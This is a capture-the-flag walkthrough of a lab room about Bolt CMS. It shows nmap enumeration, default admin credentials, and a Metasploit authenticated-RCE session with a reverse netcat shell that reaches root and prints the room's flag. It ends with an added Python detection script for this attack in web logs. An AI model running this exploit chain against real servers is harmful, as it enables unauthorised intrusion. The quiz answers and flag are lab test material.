A hero is unleashed
This room is designed for users to get familiar with Bolt CMS and how it can be exploited using an Authenticated Remote Code Execution vulnerability. You should wait at least 3-4 minutes for the machine to boot properly.
Start the machine
A hero is unleashed
Once you've deployed the VM, enumerate it before finding the flag on the machine.
What port number has a web server with a CMS running?
┌─[cyber@cyber]─[~]
└──╼ $sudo nmap -sC -sV -T5 -Pn -vv 10.10.93.20
[sudo] password for cyber:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-16 03:33 WIT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 03:33
Completed Parallel DNS resolution of 1 host. at 03:33, 0.07s elapsed
Initiating SYN Stealth Scan at 03:33
Scanning 10.10.99.51 [1000 ports]
Discovered open port 80/tcp on 10.10.99.51
Discovered open port 8000/tcp on 10.10.99.51
Discovered open port 22/tcp on 10.10.99.51
Increasing send delay for 10.10.99.51 from 0 to 5 due to 124 out of 309 dropped probes since last increase.
Warning: 10.10.99.51 giving up on port because retransmission cap hit (2).
Completed SYN Stealth Scan at 03:33, 19.75s elapsed (1000 total ports)
Initiating Service scan at 03:33
Scanning 3 services on 10.10.99.51
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1.0 404 Not Found
(?:[^<]+|<(?!/head>))*?<style>
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1.0 404 Not Found
(?:[^<]+|<(?!/head>))*?<style>
body { background-color: #ffffff; color: #000000; }
h1 { font-family: sans-serif; font-size: 150%; background-color: #9999cc; font-weight: bold; color: #000000; margin-top: 0;}
</style>'
Completed Service scan at 03:34, 32.80s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.99.51.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:34
Completed NSE at 03:34, 14.72s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:34
Completed NSE at 03:34, 1.95s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Nmap scan report for 10.10.99.51
Host is up, received user-set (0.48s latency).
Scanned at 2021-03-16 03:33:39 WIT for 70s
Not shown: 770 closed ports, 227 filtered ports
Reason: 770 resets and 227 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDaKxKph/4I3YG+2GjzPjOevcQldxrIll8wZ8SZyy2fMg3S5tl5G6PBFbF9GvlLt1X/gadOlBc99EG3hGxvAyoujfdSuXfxVznPcVuy0acAahC0ohdGp3fZaPGJMl7lW0wkPTHO19DtSsVPniBFdrWEq9vfSODxqdot8ij2PnEWfnCsj2Vf8hI8TRUBcPcQK12IsAbvBOcXOEZoxof/IQU/rSeiuYCvtQaJh+gmL7xTfDmX1Uh2+oK6yfCn87RpN2kDp3YpEHVRJ4NFNPe8lgQzekGCq0GUZxjUfFg1JNSWe1DdvnaWnz8J8dTbVZiyNG3NAVAwP1+iFARVOkiH1hi1
| 256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE52sV7veXSHXpLFmu5lrkk8HhYX2kgEtphT3g7qc1tfqX4O6gk5IlBUH25VUUHOhB5BaujcoBeId/pMh4JLpCs=
| 256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINZwq5mZftBwFP7wDFt5kinK8mM+Gk2MaPebZ4I0ukZ+
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open http syn-ack ttl 63 (PHP 7.2.32-1)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Mon, 15 Mar 2021 18:34:13 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: private, must-revalidate
| Date: Mon, 15 Mar 2021 18:34:13 GMT
| Content-Type: text/html; charset=UTF-8
| pragma: no-cache
| expires: -1
| X-Debug-Token: 587eb4
| <!doctype html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| </head>
| <body>
| href="#main-content" class="vis
| GetRequest:
| HTTP/1.0 200 OK
| Date: Mon, 15 Mar 2021 18:34:12 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: public, s-maxage=600
| Date: Mon, 15 Mar 2021 18:34:12 GMT
| Content-Type: text/html; charset=UTF-8
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| <link rel="canonical" href="http://0.0.0.0:8000/">
| </head>
|_ <body class="front">
|_http-generator: Bolt
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Bolt | A hero is unleashed
Answer = 8000
What is the username we can find in the CMS?
|_http-generator: Bolt
| http-methods:
|_ Supported Methods: GET HEAD POST
Answer = Bolt
What is the password we can find for the username?
Answer = boltadmin123
What version of the CMS is installed on the server? (Ex: Name 1.1.1)
then click login
Answer = Bolt 3.7.1
There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?
Answer = 48296
Metasploit recently added an exploit module for this vulnerability. What's the full path for that exploit? (Ex: exploit/....)
Note: if you can't find the exploit module, it's most likely because your Metasploit is not updated. Run `apt update` and then `apt install metasploit-framework`
┌─[✗]─[cyber@cyber]─[~]
└──╼ $sudo msfconsole
msf6 > search bolt 3.7.1
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/bolt_authenticated_rce 2020-05-07 excellent Yes Bolt CMS 3.7.0 - Authenticated Remote Code Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/bolt_authenticated_rce
msf6 >
Answer = exploit/unix/webapp/bolt_authenticated_rce
Set LHOST, LPORT, RHOSTS, USERNAME and PASSWORD in msfconsole before running the exploit
Before setting the options
msf6 exploit(unix/webapp/bolt_authenticated_rce) > options
Module options (exploit/unix/webapp/bolt_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_TRAVERSAL_PATH ../../../public/files yes Traversal path from "/files" on the web server to "/root" on the server
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Bolt CMS
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Linux (cmd)
Setting the options
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set RHOSTS
set RHOSTS
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set RHOSTS 10.10.93.20
RHOSTS => 10.10.93.20
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set PASSWORD boltadmin123
PASSWORD => boltadmin123
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set LHOST 10.9.169.148
LHOST => 10.9.169.148
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set USERNAME bolt
USERNAME => bolt
After setting the options
msf6 exploit(unix/webapp/bolt_authenticated_rce) > options
Module options (exploit/unix/webapp/bolt_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_TRAVERSAL_PATH ../../../public/files yes Traversal path from "/files" on the web server to "/root" on the server
PASSWORD boltadmin123 yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.93.20 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Bolt CMS
URIPATH no The URI to use for this exploit (default is random)
USERNAME bolt yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.9.169.148 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Linux (cmd)
Look for flag.txt inside the machine.
msf6 exploit(unix/webapp/bolt_authenticated_rce) > exploit
[*] Started reverse TCP handler on 10.9.169.148:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "xbeku".
[*] Found 3 potential token(s) for creating .php files.
[+] Used token 1510f7ff0b1d160710c92a46c1 to create glofrwtd.php.
[*] Attempting to execute the payload via "/files/glofrwtd.php?xbeku=`payload`"
[*] Command shell session 1 opened (10.9.169.148:4444 -> 10.10.93.20:35582) at 2021-03-16 05:15:33 +0900
[!] No response, may have executed a blocking payload!
[+] Deleted file glofrwtd.php.
[+] Reverted user profile back to original state.
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/home/bolt/public/files
ls
index.html
find / -type f -name 'flag.txt'
/home/flag.txt
cd /home
pwd
/home
ls
bolt
composer-setup.php
flag.txt
cat flag.txt
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
Answer = THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
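The module output above shows the sequence a defender can hunt for: a change to the /bolt/profile username, a .php file written into the public /files/ upload directory, and that file executed via a GET with a query parameter. The following detection logic is an added example and not part of the room or the Metasploit module; it runs over constructed Apache common-log lines (assumed format, assumed sample client addresses) and flags both any executed .php under /files/ and any client that edited the profile and then fetched such a file.

```python
import re
from urllib.parse import urlsplit

# Constructed Apache common-log sample (assumed format); not taken from the room's machine.
SAMPLE_LOG = """\
10.9.169.148 - - [16/Mar/2021:05:15:30 +0900] "POST /bolt/login HTTP/1.1" 302 0
10.9.169.148 - - [16/Mar/2021:05:15:31 +0900] "POST /bolt/profile HTTP/1.1" 302 0
10.9.169.148 - - [16/Mar/2021:05:15:33 +0900] "GET /files/glofrwtd.php?xbeku=id HTTP/1.1" 200 512
10.10.14.7 - - [16/Mar/2021:05:20:01 +0900] "GET /files/index.html HTTP/1.1" 200 10
10.10.14.7 - - [16/Mar/2021:05:20:05 +0900] "POST /bolt/profile HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_log(text):
    """Parse common-log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ev = m.groupdict()
            parts = urlsplit(ev["target"])
            ev["path"], ev["query"] = parts.path, parts.query
            events.append(ev)
    return events


def is_php_under_files(ev):
    """/files/ holds uploads, so a .php path there should never be served, let alone executed."""
    return ev["path"].startswith("/files/") and ev["path"].lower().endswith(".php")


def php_under_files(events):
    """Every request for a .php file under /files/, with the client that made it."""
    return [(e["ip"], e["target"]) for e in events if is_php_under_files(e)]


def profile_edit_then_php(events):
    """Clients that POSTed to /bolt/profile and afterwards fetched .php under /files/ (the module's sequence)."""
    edited, flagged = set(), set()
    for e in events:
        if e["method"] == "POST" and e["path"] == "/bolt/profile":
            edited.add(e["ip"])
        elif e["ip"] in edited and is_php_under_files(e):
            flagged.add(e["ip"])
    return flagged


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("php under /files/:", php_under_files(evs))
    print("profile edit followed by php exec:", profile_edit_then_php(evs))
```

The second client edits its profile but never requests a .php under /files/, so only the first is flagged; the simpler per-request rule catches the executed file on its own even when the profile edit happened in an earlier log file.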